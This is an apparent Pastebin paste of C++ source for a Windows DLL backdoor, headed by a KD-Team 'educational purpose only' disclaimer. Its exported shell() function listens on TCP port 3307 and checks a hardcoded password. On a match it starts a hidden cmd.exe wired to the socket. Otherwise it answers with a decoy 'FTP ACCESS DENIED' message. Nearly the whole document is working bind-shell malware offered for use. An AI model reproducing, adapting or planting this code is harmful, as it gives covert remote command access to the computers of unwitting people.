Guest User

DiabloHorn

a guest
Nov 9th, 2009
226
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  3. +This is a little Disclaimer for if you havn't read the one on our site.       +
  4. +The tools and tutorials KD-Team develops and publishes are only ment for          +
  5. +educational purpose only.WE DO NOT encourage the use of this tools and            +
  6. +tutorials for mailicious purpose.We learned a lot during the development of them  +
  7. +so we hope you also learn and don't just use it without any brains.           +
  8. +We take completly NO responsability for any damage caused by them nor             +
  9. +are we or our isp responsible for what you do with them.              +
  10. +Greetz: KD-Team                                           +
  11. +http://www.kd-team.com                                            +
  12. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  13. */
  14. #include <winsock2.h>
  15. #include <windows.h>
  16. #include <stdio.h>
  17. #include <stdlib.h>
  18.  
  19.  
  20. #define SERVPORT 3307
  21. #define RCVBUFSIZE 32
  22. #define PASSWORD "itworksihope"
  23.  
  24. extern "C" __declspec (dllexport) int shell()
  25. {
  26. //normal things for the socket setupt etc
  27.     WSADATA wsa;
  28.     SOCKET hSock;
  29.     SOCKET hLstnSock;
  30.     unsigned int ClientLen;
  31.     struct sockaddr_in ServAddr;
  32.     struct sockaddr_in ClientAddr;
  33.     STARTUPINFO si;
  34.     PROCESS_INFORMATION pi={0};
  35.     int BytesRcvd;
  36.     char *tok;
  37.     char echoBuffer[RCVBUFSIZE];
  38.     char comspec[MAX_PATH];
  39.  
  40. //setting up wsa
  41.     if(WSAStartup(MAKEWORD(2,0),&wsa) != 0)
  42.     {
  43.         //printf("WSAStartup() failed\n");
  44.     }
  45.  
  46. //zeroing out the struct and filling it
  47.     memset(&ServAddr,0,sizeof(ServAddr));
  48.     ServAddr.sin_family = AF_INET;
  49.     ServAddr.sin_addr.s_addr = htonl(INADDR_ANY);
  50.     ServAddr.sin_port = htons(SERVPORT);
  51.  
  52. //making the socket NOTE it must be WSASocket else it won't pass the handle to the Process
  53.     if((hLstnSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,0,0,0)) < 0)
  54.     {
  55.         //printf("socket() %d failed\n",WSAGetLastError());
  56.         WSACleanup();
  57.     }
  58. //binding the listening socket.
  59.     if(bind(hLstnSock,(struct sockaddr *)&ServAddr,sizeof(ServAddr)) < 0)
  60.     {
  61.         //printf("bind() %d failed\n",WSAGetLastError());
  62.         closesocket(hLstnSock);
  63.     }
  64. //listening
  65.     if(listen(hLstnSock,1)< 0)
  66.     {
  67.         //printf("listen() %d failed\n",WSAGetLastError());
  68.         closesocket(hLstnSock);
  69.         WSACleanup();
  70.     }
  71.  
  72. //the never ending loop :p
  73.     while(1)
  74.     {
  75.         ClientLen = sizeof(ClientAddr);
  76. //accepting the incomming connection
  77.         hSock = accept(hLstnSock, (struct sockaddr *)&ClientAddr, (int *)&ClientLen);
  78.         if(hSock == INVALID_SOCKET)
  79.         {
  80.             break;
  81.         }
  82.         BytesRcvd = recv(hSock, echoBuffer,RCVBUFSIZE -1,0);
  83.         if(BytesRcvd > 0)
  84.         {
  85. //this is the little authentication sequence
  86. //a strtok() is needed since -1 doens't always do what one wants.
  87.  
  88.             tok = strtok(echoBuffer,"\n");
  89.             if((strcmp(echoBuffer,PASSWORD))==0)
  90.             {
  91.                 //printf("Pass correct\n");
  92. //when succeeded the actual shell spawning happens.
  93.  
  94.                 memset(&si,0,sizeof(si));
  95.                 GetStartupInfo(&si);
  96. //setting the flags correct
  97.                 si.cb = sizeof(si);
  98.                 si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
  99.                 si.wShowWindow = SW_HIDE;
  100.                 si.hStdInput = (HANDLE)hSock;
  101.                 si.hStdOutput = (HANDLE)hSock;
  102.                 si.hStdError =(HANDLE)hSock;
  103. //this is just handier then defining cmd.exe by hand.
  104.                 if(GetEnvironmentVariable("COMSPEC", comspec, MAX_PATH) == 0)
  105.                 {
  106.                     //printf("Environment var failed\n");
  107.                     break;
  108.                 }
  109. //creating the process that will create the shell
  110.                 if(!CreateProcess(NULL,comspec, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, 0, NULL, &si, &pi)) //CREATE_NO_WINDOW
  111.                 {
  112.                     //printf("process creation failed\n");
  113.                     break;
  114.                 }
  115. //waiting till finished
  116.                 WaitForSingleObject(pi.hProcess, INFINITE);
  117. //little cleanup
  118.                 CloseHandle(pi.hProcess);
  119.                 CloseHandle(pi.hThread);
  120.                 closesocket(hSock);
  121.             }
  122.             else
  123.             {
  124. //if auth sequence failed well kick the bastard out.
  125.                 //printf("incorrect pass\n");
  126.                 send(hSock,"FTP ACCESS DENIED\n",strlen("FTP ACCESS DENIED\n"),0);
  127.                 closesocket(hSock);
  128.             }
  129.         }
  130.  
  131.     }
  132.     closesocket(hLstnSock);
  133.     return 0;
  134. }
  135.  
RAW Paste Data